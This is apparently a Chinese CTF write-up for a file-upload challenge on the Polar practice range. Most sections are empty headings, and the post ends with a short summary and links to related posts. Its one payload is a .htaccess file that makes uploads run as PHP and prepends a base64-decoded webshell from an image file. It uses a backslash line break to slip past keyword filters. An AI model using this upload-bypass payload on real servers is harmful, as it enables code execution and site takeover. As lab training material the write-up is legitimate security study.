Polar Web【困难】上传

栖桐

 关注

阅读 89

2024-06-13

Polar Web【困难】上传

Contents

探索&思路&效果

进入环境

index

绕过过程

up
1
upload
2

Webshell连接

3
flag

EXP

Payload

SetHandler application/x-httpd-php
php_value auto_prepend_fi\
le "php://filter/convert.base64-decode/resource=sh.jpg"

总结

  • 作为对笔者在Polar靶场中Web方向【困难】之路的开门红… 很难说本题容易…
  • 本题以文件上传为主线
    • .htaccess 文件上传绕过的一种思路
    • php://filter/convert.base64-encode/resource= 进行文件写入
    • 反斜杠 \ 进行字符串截断并换行分割来实现字样绕过的方式







敬,不完美的明天

相关推荐

【Polar靶场WEB签到】

王传学 107 0 0

Polar Web【简单】php very nice

舟海君 70 0 0

Web文件上传总结

小_北_爸 39 0 0

SpringBoot Web开发——文件上传

whiteMu 54 0 0

Web安全—文件上传漏洞

sunflower821 45 0 0

【Web后端】实现文件上传

Go_Viola 9 0 0

Matplotlib plt.polar绘制圆形

树下的老石头 94 0 0

【困难】安装栅栏

践行数据分析 91 0 0

定位 div 困难

老榆 38 0 0

web实现大文件上传分片上传断点续传

兮城 89 0 0

精彩评论(0)

0 0 举报